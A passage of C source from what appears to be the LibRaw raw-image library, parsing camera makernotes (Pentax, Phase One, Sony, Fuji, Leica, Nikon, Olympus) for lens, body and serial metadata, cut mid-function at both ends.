case 2: imgdata.lens.makernotes.MinAp4MinFocal = 32.0f; break;
case 4: imgdata.lens.makernotes.MinAp4MinFocal = 45.0f; break;
case 6: imgdata.lens.makernotes.MinAp4MinFocal = 16.0f; break;
}
if (table_buf[iLensData] & 0x70)
imgdata.lens.makernotes.LensFStops =
((float)(((table_buf[iLensData] & 0x70) >> 4) ^ 0x07)) / 2.0f + 5.0f;
imgdata.lens.makernotes.MinFocusDistance = (float)(table_buf[iLensData+3] & 0xf8);
imgdata.lens.makernotes.FocusRangeIndex = (float)(table_buf[iLensData+3] & 0x07);
if ((table_buf[iLensData+14] > 1) &&
(fabs(imgdata.lens.makernotes.MaxAp4CurFocal) < 0.7f))
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+14] & 0x7f) -1)/32.0f);
}
else if ((id != 0x12e76) && // K-5
(table_buf[iLensData+15] > 1) &&
(fabs(imgdata.lens.makernotes.MaxAp4CurFocal) < 0.7f))
{
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+15] & 0x7f) -1)/32.0f);
}
}
free(table_buf);
return;
}
void CLASS setPhaseOneFeatures (unsigned id) {
ushort i;
static const struct {
ushort id;
char t_model[32];
} p1_unique[] = {
// Phase One section:
{1, "Hasselblad V"},
{10, "PhaseOne/Mamiya"},
{12, "Contax 645"},
{16, "Hasselblad V"},
{17, "Hasselblad V"},
{18, "Contax 645"},
{19, "PhaseOne/Mamiya"},
{20, "Hasselblad V"},
{21, "Contax 645"},
{22, "PhaseOne/Mamiya"},
{23, "Hasselblad V"},
{24, "Hasselblad H"},
{25, "PhaseOne/Mamiya"},
{32, "Contax 645"},
{34, "Hasselblad V"},
{35, "Hasselblad V"},
{36, "Hasselblad H"},
{37, "Contax 645"},
{38, "PhaseOne/Mamiya"},
{39, "Hasselblad V"},
{40, "Hasselblad H"},
{41, "Contax 645"},
{42, "PhaseOne/Mamiya"},
{44, "Hasselblad V"},
{45, "Hasselblad H"},
{46, "Contax 645"},
{47, "PhaseOne/Mamiya"},
{48, "Hasselblad V"},
{49, "Hasselblad H"},
{50, "Contax 645"},
{51, "PhaseOne/Mamiya"},
{52, "Hasselblad V"},
{53, "Hasselblad H"},
{54, "Contax 645"},
{55, "PhaseOne/Mamiya"},
{67, "Hasselblad V"},
{68, "Hasselblad H"},
{69, "Contax 645"},
{70, "PhaseOne/Mamiya"},
{71, "Hasselblad V"},
{72, "Hasselblad H"},
{73, "Contax 645"},
{74, "PhaseOne/Mamiya"},
{76, "Hasselblad V"},
{77, "Hasselblad H"},
{78, "Contax 645"},
{79, "PhaseOne/Mamiya"},
{80, "Hasselblad V"},
{81, "Hasselblad H"},
{82, "Contax 645"},
{83, "PhaseOne/Mamiya"},
{84, "Hasselblad V"},
{85, "Hasselblad H"},
{86, "Contax 645"},
{87, "PhaseOne/Mamiya"},
{99, "Hasselblad V"},
{100, "Hasselblad H"},
{101, "Contax 645"},
{102, "PhaseOne/Mamiya"},
{103, "Hasselblad V"},
{104, "Hasselblad H"},
{105, "PhaseOne/Mamiya"},
{106, "Contax 645"},
{112, "Hasselblad V"},
{113, "Hasselblad H"},
{114, "Contax 645"},
{115, "PhaseOne/Mamiya"},
{131, "Hasselblad V"},
{132, "Hasselblad H"},
{133, "Contax 645"},
{134, "PhaseOne/Mamiya"},
{135, "Hasselblad V"},
{136, "Hasselblad H"},
{137, "Contax 645"},
{138, "PhaseOne/Mamiya"},
{140, "Hasselblad V"},
{141, "Hasselblad H"},
{142, "Contax 645"},
{143, "PhaseOne/Mamiya"},
{148, "Hasselblad V"},
{149, "Hasselblad H"},
{150, "Contax 645"},
{151, "PhaseOne/Mamiya"},
{160, "A-250"},
{161, "A-260"},
{162, "A-280"},
{167, "Hasselblad V"},
{168, "Hasselblad H"},
{169, "Contax 645"},
{170, "PhaseOne/Mamiya"},
{172, "Hasselblad V"},
{173, "Hasselblad H"},
{174, "Contax 645"},
{175, "PhaseOne/Mamiya"},
{176, "Hasselblad V"},
{177, "Hasselblad H"},
{178, "Contax 645"},
{179, "PhaseOne/Mamiya"},
{180, "Hasselblad V"},
{181, "Hasselblad H"},
{182, "Contax 645"},
{183, "PhaseOne/Mamiya"},
{208, "Hasselblad V"},
{211, "PhaseOne/Mamiya"},
{448, "Phase One 645AF"},
{457, "Phase One 645DF"},
{471, "Phase One 645DF+"},
{704, "Phase One iXA"},
{705, "Phase One iXA - R"},
{706, "Phase One iXU 150"},
{707, "Phase One iXU 150 - NIR"},
{708, "Phase One iXU 180"},
{721, "Phase One iXR"},
// Leaf section:
{333,"Mamiya"},
{329,"Universal"},
{330,"Hasselblad H1/H2"},
{332,"Contax"},
{336,"AFi"},
{327,"Mamiya"},
{324,"Universal"},
{325,"Hasselblad H1/H2"},
{326,"Contax"},
{335,"AFi"},
{340,"Mamiya"},
{337,"Universal"},
{338,"Hasselblad H1/H2"},
{339,"Contax"},
{323,"Mamiya"},
{320,"Universal"},
{322,"Hasselblad H1/H2"},
{321,"Contax"},
{334,"AFi"},
{369,"Universal"},
{370,"Mamiya"},
{371,"Hasselblad H1/H2"},
{372,"Contax"},
{373,"Afi"},
};
imgdata.lens.makernotes.CamID = id;
if (id && !imgdata.lens.makernotes.body[0]) {
for (i=0; i < sizeof p1_unique / sizeof *p1_unique; i++)
if (id == p1_unique[i].id) {
strcpy(imgdata.lens.makernotes.body,p1_unique[i].t_model);
}
}
return;
}
void CLASS parseFujiMakernotes (unsigned tag, unsigned type) {
switch (tag) {
case 0x1002: imgdata.makernotes.fuji.WB_Preset = get2(); break;
case 0x1011: imgdata.other.FlashEC = getreal(type); break;
case 0x1020: imgdata.makernotes.fuji.Macro = get2(); break;
case 0x1021: imgdata.makernotes.fuji.FocusMode = get2(); break;
case 0x1022: imgdata.makernotes.fuji.AFMode = get2(); break;
case 0x1023: imgdata.makernotes.fuji.FocusPixel[0] = get2();
imgdata.makernotes.fuji.FocusPixel[1] = get2();
break;
case 0x1034: imgdata.makernotes.fuji.ExrMode = get2(); break;
case 0x1050: imgdata.makernotes.fuji.ShutterType = get2(); break;
case 0x1400: imgdata.makernotes.fuji.FujiDynamicRange = get2(); break;
case 0x1401: imgdata.makernotes.fuji.FujiFilmMode = get2(); break;
case 0x1402: imgdata.makernotes.fuji.FujiDynamicRangeSetting = get2(); break;
case 0x1403: imgdata.makernotes.fuji.FujiDevelopmentDynamicRange = get2(); break;
case 0x140b: imgdata.makernotes.fuji.FujiAutoDynamicRange = get2(); break;
case 0x1404: imgdata.lens.makernotes.MinFocal = getreal(type); break;
case 0x1405: imgdata.lens.makernotes.MaxFocal = getreal(type); break;
case 0x1406: imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type); break;
case 0x1407: imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type); break;
case 0x1422: imgdata.makernotes.fuji.ImageStabilization[0] = get2();
imgdata.makernotes.fuji.ImageStabilization[1] = get2();
imgdata.makernotes.fuji.ImageStabilization[2] = get2();
imgdata.shootinginfo.ImageStabilization = (imgdata.makernotes.fuji.ImageStabilization[0]<<9) + imgdata.makernotes.fuji.ImageStabilization[1];
break;
case 0x1431: imgdata.makernotes.fuji.Rating = get4(); break;
case 0x3820: imgdata.makernotes.fuji.FrameRate = get2(); break;
case 0x3821: imgdata.makernotes.fuji.FrameWidth = get2(); break;
case 0x3822: imgdata.makernotes.fuji.FrameHeight = get2(); break;
}
return;
}
void CLASS setSonyBodyFeatures (unsigned id) {
imgdata.lens.makernotes.CamID = id;
if ( // FF cameras
(id == 257) || // a900
(id == 269) || // a850
(id == 340) || // ILCE-7M2
(id == 318) || // ILCE-7S
(id == 350) || // ILCE-7SM2
(id == 311) || // ILCE-7R
(id == 347) || // ILCE-7RM2
(id == 306) || // ILCE-7
(id == 298) || // DSC-RX1
(id == 299) || // NEX-VG900
(id == 310) || // DSC-RX1R
(id == 344) || // DSC-RX1RM2
(id == 354) || // ILCA-99M2
(id == 294) // SLT-99, Hasselblad HV
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
}
else if ((id == 297) || // DSC-RX100
(id == 308) || // DSC-RX100M2
(id == 309) || // DSC-RX10
(id == 317) || // DSC-RX100M3
(id == 341) || // DSC-RX100M4
(id == 342) || // DSC-RX10M2
(id == 355) || // DSC-RX10M3
(id == 356) // DSC-RX100M5
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_1INCH;
}
else if (id != 002) // DSC-R1
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
}
if ( // E-mount cameras, ILCE series
(id == 302) ||
(id == 306) ||
(id == 311) ||
(id == 312) ||
(id == 313) ||
(id == 318) ||
(id == 339) ||
(id == 340) ||
(id == 346) ||
(id == 347) ||
(id == 350) ||
(id == 360)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Sony_E;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_ILCE;
}
else if ( // E-mount cameras, NEX series
(id == 278) ||
(id == 279) ||
(id == 284) ||
(id == 288) ||
(id == 289) ||
(id == 290) ||
(id == 293) ||
(id == 295) ||
(id == 296) ||
(id == 299) ||
(id == 300) ||
(id == 305) ||
(id == 307)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Sony_E;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_NEX;
}
else if ( // A-mount cameras, DSLR series
(id == 256) ||
(id == 257) ||
(id == 258) ||
(id == 259) ||
(id == 260) ||
(id == 261) ||
(id == 262) ||
(id == 263) ||
(id == 264) ||
(id == 265) ||
(id == 266) ||
(id == 269) ||
(id == 270) ||
(id == 273) ||
(id == 274) ||
(id == 275) ||
(id == 282) ||
(id == 283)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_DSLR;
}
else if ( // A-mount cameras, SLT series
(id == 280) ||
(id == 281) ||
(id == 285) ||
(id == 286) ||
(id == 287) ||
(id == 291) ||
(id == 292) ||
(id == 294) ||
(id == 303)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_SLT;
}
else if ( // A-mount cameras, ILCA series
(id == 319) ||
(id == 353) ||
(id == 354)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_ILCA;
}
else if ( // DSC
(id == 002) || // DSC-R1
(id == 297) || // DSC-RX100
(id == 298) || // DSC-RX1
(id == 308) || // DSC-RX100M2
(id == 309) || // DSC-RX10
(id == 310) || // DSC-RX1R
(id == 344) || // DSC-RX1RM2
(id == 317) || // DSC-RX100M3
(id == 341) || // DSC-RX100M4
(id == 342) || // DSC-RX10M2
(id == 355) || // DSC-RX10M3
(id == 356) // DSC-RX100M5
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_DSC;
}
return;
}
void CLASS parseSonyLensType2 (uchar a, uchar b) {
ushort lid2;
lid2 = (((ushort)a)<<8) | ((ushort)b);
if (!lid2) return;
if (lid2 < 0x100)
{
if ((imgdata.lens.makernotes.AdapterID != 0x4900) &&
(imgdata.lens.makernotes.AdapterID != 0xEF00))
{
imgdata.lens.makernotes.AdapterID = lid2;
switch (lid2) {
case 1:
case 2:
case 3:
case 6:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
break;
case 44:
case 78:
case 239:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
break;
}
}
}
else
imgdata.lens.makernotes.LensID = lid2;
if ((lid2 >= 50481) && (lid2 < 50500))
{
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
imgdata.lens.makernotes.AdapterID = 0x4900;
}
return;
}
#define strnXcat(buf,string) strncat(buf,string,LIM(sizeof(buf)-strbuflen(buf)-1,0,sizeof(buf)))
void CLASS parseSonyLensFeatures (uchar a, uchar b) {
ushort features;
features = (((ushort)a)<<8) | ((ushort)b);
if ((imgdata.lens.makernotes.LensMount == LIBRAW_MOUNT_Canon_EF) ||
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Sigma_X3F) ||
!features)
return;
imgdata.lens.makernotes.LensFeatures_pre[0] = 0;
imgdata.lens.makernotes.LensFeatures_suf[0] = 0;
if ((features & 0x0200) && (features & 0x0100)) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "E");
else if (features & 0x0200) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "FE");
else if (features & 0x0100) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "DT");
if (!imgdata.lens.makernotes.LensFormat && !imgdata.lens.makernotes.LensMount)
{
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FF;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
if ((features & 0x0200) && (features & 0x0100)) {
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
} else if (features & 0x0200) {
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
} else if (features & 0x0100) {
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
}
}
if (features & 0x4000)
strnXcat(imgdata.lens.makernotes.LensFeatures_pre, " PZ");
if (features & 0x0008)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " G");
else if (features & 0x0004)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " ZA" );
if ((features & 0x0020) && (features & 0x0040))
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Macro");
else if (features & 0x0020)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " STF");
else if (features & 0x0040)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Reflex");
else if (features & 0x0080)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Fisheye");
if (features & 0x0001)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " SSM");
else if (features & 0x0002)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " SAM");
if (features & 0x8000)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " OSS");
if (features & 0x2000)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " LE");
if (features & 0x0800)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " II");
if (imgdata.lens.makernotes.LensFeatures_suf[0] == ' ')
memmove(imgdata.lens.makernotes.LensFeatures_suf, imgdata.lens.makernotes.LensFeatures_suf+1,
strbuflen(imgdata.lens.makernotes.LensFeatures_suf)-1);
return;
}
#undef strnXcat
void CLASS process_Sony_0x940c (uchar * buf)
{
ushort lid2;
if ((imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF) &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Sigma_X3F))
{
switch (SonySubstitution[buf[0x0008]]) {
case 1:
case 5:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
break;
case 4:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
break;
}
}
lid2 = (((ushort)SonySubstitution[buf[0x000a]])<<8) |
((ushort)SonySubstitution[buf[0x0009]]);
if ((lid2 > 0) && (lid2 < 32784))
parseSonyLensType2 (SonySubstitution[buf[0x000a]], // LensType2 - Sony lens ids
SonySubstitution[buf[0x0009]]);
return;
}
void CLASS process_Sony_0x9050 (uchar * buf, unsigned id)
{
ushort lid;
if ((imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_Sony_E) &&
(imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens))
{
if (buf[0])
imgdata.lens.makernotes.MaxAp4CurFocal =
my_roundf(libraw_powf64(2.0f, ((float)SonySubstitution[buf[0]] / 8.0 - 1.06f) / 2.0f)*10.0f) / 10.0f;
if (buf[1])
imgdata.lens.makernotes.MinAp4CurFocal =
my_roundf(libraw_powf64(2.0f, ((float)SonySubstitution[buf[1]] / 8.0 - 1.06f) / 2.0f)*10.0f) / 10.0f;
}
if (imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens)
{
if (buf[0x3d] | buf[0x3c])
{
lid = SonySubstitution[buf[0x3d]] << 8 |
SonySubstitution[buf[0x3c]];
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/256.0f - 16.0f) / 2.0f);
}
if (buf[0x105] &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF) &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Sigma_X3F))
imgdata.lens.makernotes.LensMount =
SonySubstitution[buf[0x105]];
if (buf[0x106])
imgdata.lens.makernotes.LensFormat =
SonySubstitution[buf[0x106]];
}
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
parseSonyLensType2 (SonySubstitution[buf[0x0108]], // LensType2 - Sony lens ids
SonySubstitution[buf[0x0107]]);
}
if ((imgdata.lens.makernotes.LensID == -1) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Minolta_A) &&
(buf[0x010a] | buf[0x0109]))
{
imgdata.lens.makernotes.LensID = // LensType - Minolta/Sony lens ids
SonySubstitution[buf[0x010a]] << 8 |
SonySubstitution[buf[0x0109]];
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
}
if ((id >= 286) && (id <= 293))
// "SLT-A65", "SLT-A77", "NEX-7", "NEX-VG20E",
// "SLT-A37", "SLT-A57", "NEX-F3", "Lunar"
parseSonyLensFeatures (SonySubstitution[buf[0x115]],
SonySubstitution[buf[0x116]]);
else if (imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens)
parseSonyLensFeatures(SonySubstitution[buf[0x116]], SonySubstitution[buf[0x117]]);
if ((id == 347) || (id == 350) || (id == 357))
{
unsigned long long b88 = SonySubstitution[buf[0x88]];
unsigned long long b89 = SonySubstitution[buf[0x89]];
unsigned long long b8a = SonySubstitution[buf[0x8a]];
unsigned long long b8b = SonySubstitution[buf[0x8b]];
unsigned long long b8c = SonySubstitution[buf[0x8c]];
unsigned long long b8d = SonySubstitution[buf[0x8d]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%06llx",
(b88 << 40) + (b89 << 32) + (b8a << 24) + (b8b << 16) + (b8c << 8) + b8d);
}
else if ((imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Minolta_A) && (id > 279) && (id != 282) && (id != 283))
{
unsigned long long bf0 = SonySubstitution[buf[0xf0]];
unsigned long long bf1 = SonySubstitution[buf[0xf1]];
unsigned long long bf2 = SonySubstitution[buf[0xf2]];
unsigned long long bf3 = SonySubstitution[buf[0xf3]];
unsigned long long bf4 = SonySubstitution[buf[0xf4]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%05llx",
(bf0 << 32) + (bf1 << 24) + (bf2 << 16) + (bf3 << 8) + bf4);
}
else if ((imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E) && (id != 288) && (id != 289) && (id != 290))
{
unsigned b7c = SonySubstitution[buf[0x7c]];
unsigned b7d = SonySubstitution[buf[0x7d]];
unsigned b7e = SonySubstitution[buf[0x7e]];
unsigned b7f = SonySubstitution[buf[0x7f]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%04x", (b7c << 24) + (b7d << 16) + (b7e << 8) + b7f);
}
return;
}
void CLASS parse_makernote_0xc634(int base, int uptag, unsigned dng_writer)
{
unsigned ver97 = 0, offset = 0, entries, tag, type, len, save, c;
unsigned i;
uchar NikonKey, ci, cj, ck;
unsigned serial = 0;
unsigned custom_serial = 0;
unsigned NikonLensDataVersion = 0;
unsigned lenNikonLensData = 0;
unsigned NikonFlashInfoVersion = 0;
uchar *CanonCameraInfo;
unsigned lenCanonCameraInfo = 0;
uchar *table_buf;
uchar *table_buf_0x9050;
ushort table_buf_0x9050_present = 0;
uchar *table_buf_0x940c;
ushort table_buf_0x940c_present = 0;
short morder, sorder = order;
char buf[10];
INT64 fsize = ifp->size();
fread(buf, 1, 10, ifp);
if (!strcmp(buf, "Nikon")) {
base = ftell(ifp);
order = get2();
if (get2() != 42) goto quit;
offset = get4();
fseek(ifp, offset - 8, SEEK_CUR);
}
else if (!strcmp(buf, "OLYMPUS") ||
!strcmp(buf, "PENTAX ") ||
(!strncmp(make, "SAMSUNG", 7) && (dng_writer == CameraDNG))) {
base = ftell(ifp) - 10;
fseek(ifp, -2, SEEK_CUR);
order = get2();
if (buf[0] == 'O') get2();
}
else if (!strncmp(buf, "SONY", 4) ||
!strcmp(buf, "Panasonic")) {
goto nf;
}
else if (!strncmp(buf, "FUJIFILM", 8)) {
base = ftell(ifp) - 10;
nf: order = 0x4949;
fseek(ifp, 2, SEEK_CUR);
}
else if (!strcmp(buf, "OLYMP") ||
!strcmp(buf, "LEICA") ||
!strcmp(buf, "Ricoh") ||
!strcmp(buf, "EPSON"))
fseek(ifp, -2, SEEK_CUR);
else if (!strcmp(buf, "AOC") ||
!strcmp(buf, "QVC"))
fseek(ifp, -4, SEEK_CUR);
else {
fseek(ifp, -10, SEEK_CUR);
if ((!strncmp(make, "SAMSUNG", 7) &&
(dng_writer == AdobeDNG)))
base = ftell(ifp);
}
entries = get2();
if (entries > 1000) return;
morder = order;
while (entries--) {
order = morder;
tiff_get(base, &tag, &type, &len, &save);
INT64 pos = ifp->tell();
if(len > 8 && pos+len > 2* fsize) continue;
tag |= uptag << 16;
if(len > 100*1024*1024) goto next; // 100Mb tag? No!
if (!strncmp(make, "Canon",5))
{
if (tag == 0x000d && len < 256000) // camera info
{
CanonCameraInfo = (uchar*)malloc(MAX(16,len));
fread(CanonCameraInfo, len, 1, ifp);
lenCanonCameraInfo = len;
}
else if (tag == 0x10) // Canon ModelID
{
unique_id = get4();
if (unique_id == 0x03740000) unique_id = 0x80000374; // M3
if (unique_id == 0x03840000) unique_id = 0x80000384; // M10
if (unique_id == 0x03940000) unique_id = 0x80000394; // M5
setCanonBodyFeatures(unique_id);
if (lenCanonCameraInfo)
{
processCanonCameraInfo(unique_id, CanonCameraInfo,lenCanonCameraInfo);
free(CanonCameraInfo);
CanonCameraInfo = 0;
lenCanonCameraInfo = 0;
}
}
else parseCanonMakernotes (tag, type, len);
}
else if (!strncmp(make, "FUJI", 4))
parseFujiMakernotes (tag, type);
else if (!strncasecmp(make, "LEICA", 5))
{
if (((tag == 0x035e) || (tag == 0x035f)) && (type == 10) && (len == 9))
{
int ind = tag == 0x035e?0:1;
for (int j=0; j < 3; j++)
FORCC imgdata.color.dng_color[ind].forwardmatrix[j][c]= getreal(type);
}
if ((tag == 0x0303) && (type != 4))
{
stmread(imgdata.lens.makernotes.Lens, len,ifp);
}
if ((tag == 0x3405) ||
(tag == 0x0310) ||
(tag == 0x34003405))
{
imgdata.lens.makernotes.LensID = get4();
imgdata.lens.makernotes.LensID =
((imgdata.lens.makernotes.LensID>>2)<<8) |
(imgdata.lens.makernotes.LensID & 0x3);
if (imgdata.lens.makernotes.LensID != -1)
{
if ((model[0] == 'M') ||
!strncasecmp (model, "LEICA M", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_M;
}
else if ((model[0] == 'S') ||
!strncasecmp (model, "LEICA S", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_S;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_S;
}
}
}
else if (
((tag == 0x0313) || (tag == 0x34003406)) &&
(fabs(imgdata.lens.makernotes.CurAp) < 0.17f) &&
((type == 10) || (type == 5))
)
{
imgdata.lens.makernotes.CurAp = getreal(type);
if (imgdata.lens.makernotes.CurAp > 126.3)
imgdata.lens.makernotes.CurAp = 0.0f;
}
else if (tag == 0x3400)
{
parse_makernote (base, 0x3400);
}
}
else if (!strncmp(make, "NIKON", 5))
{
if (tag == 0x1d) // serial number
while ((c = fgetc(ifp)) && c != EOF)
{
if ((!custom_serial) && (!isdigit(c)))
{
if ((strbuflen(model) == 3) && (!strcmp(model,"D50")))
{
custom_serial = 34;
}
else
{
custom_serial = 96;
}
}
serial = serial*10 + (isdigit(c) ? c - '0' : c % 10);
}
else if (tag == 0x000a)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
else if (tag == 0x0082) // lens attachment
{
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
}
else if (tag == 0x0083) // lens type
{
imgdata.lens.nikon.NikonLensType = fgetc(ifp);
}
else if (tag == 0x0084) // lens
{
imgdata.lens.makernotes.MinFocal = getreal(type);
imgdata.lens.makernotes.MaxFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type);
}
else if (tag == 0x008b) // lens f-stops
{
uchar a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c)
{
imgdata.lens.nikon.NikonLensFStops = a*b*(12/c);
imgdata.lens.makernotes.LensFStops =
(float)imgdata.lens.nikon.NikonLensFStops /12.0f;
}
}
else if (tag == 0x0093)
{
i = get2();
if ((i == 7) || (i == 9))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0097)
{
for (i=0; i < 4; i++)
ver97 = ver97 * 10 + fgetc(ifp)-'0';
if (ver97 == 601) // Coolpix A
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0098) // contains lens data
{
for (i = 0; i < 4; i++)
{
NikonLensDataVersion = NikonLensDataVersion * 10 + fgetc(ifp) - '0';
}
switch (NikonLensDataVersion)
{
case 100: lenNikonLensData = 9; break;
case 101:
case 201: // encrypted, starting from v.201
case 202:
case 203: lenNikonLensData = 15; break;
case 204: lenNikonLensData = 16; break;
case 400: lenNikonLensData = 459; break;
case 401: lenNikonLensData = 590; break;
case 402: lenNikonLensData = 509; break;
case 403: lenNikonLensData = 879; break;
}
if(lenNikonLensData)
{
table_buf = (uchar*)malloc(lenNikonLensData);
fread(table_buf, lenNikonLensData, 1, ifp);
if ((NikonLensDataVersion < 201) && lenNikonLensData)
{
processNikonLensData(table_buf, lenNikonLensData);
free(table_buf);
lenNikonLensData = 0;
}
}
}
else if (tag == 0xa7) // shutter count
{
NikonKey = fgetc(ifp) ^ fgetc(ifp) ^ fgetc(ifp) ^ fgetc(ifp);
if ((NikonLensDataVersion > 200) && lenNikonLensData)
{
if (custom_serial)
{
ci = xlat[0][custom_serial];
}
else
{
ci = xlat[0][serial & 0xff];
}
cj = xlat[1][NikonKey];
ck = 0x60;
for (i = 0; i < lenNikonLensData; i++)
table_buf[i] ^= (cj += ci * ck++);
processNikonLensData(table_buf, lenNikonLensData);
lenNikonLensData = 0;
free(table_buf);
}
}
else if (tag == 0x00a8) // contains flash data
{
for (i = 0; i < 4; i++)
{
NikonFlashInfoVersion = NikonFlashInfoVersion * 10 + fgetc(ifp) - '0';
}
}
else if (tag == 37 && (!iso_speed || iso_speed == 65535))
{
unsigned char cc;
fread(&cc, 1, 1, ifp);
iso_speed = (int)(100.0 * libraw_powf64(2.0, (double)(cc) / 12.0 - 5.0));
break;
}
}
else if (!strncmp(make, "OLYMPUS", 7))
{
int SubDirOffsetValid =
strncmp (model, "E-300", 5) &&
strncmp (model, "E-330", 5) &&
strncmp (model, "E-400", 5) &&
strncmp (model, "E-500", 5) &&
strncmp (model, "E-1", 3);
if ((tag == 0x2010) || (tag == 0x2020))
{
fseek(ifp, save - 4, SEEK_SET);
fseek(ifp, base + get4(), SEEK_SET);
parse_makernote_0xc634(base, tag, dng_writer);
}
if (!SubDirOffsetValid &&
((len > 4) ||
( ((type == 3) || (type == 8)) && (len > 2)) ||
( ((type == 4) || (type == 9)) && (len > 1)) || (type == 5) || (type > 9)))
goto skip_Oly_broken_tags;
switch (tag) {
case 0x0207:
case 0x20100100:
{
uchar sOlyID[8];
unsigned long long OlyID;
fread (sOlyID, MIN(len,7), 1, ifp);
sOlyID[7] = 0;
OlyID = sOlyID[0];
i = 1;
while (i < 7 && sOlyID[i])
{
OlyID = OlyID << 8 | sOlyID[i];
i++;
}
setOlympusBodyFeatures(OlyID);
}
break;
case 0x1002:
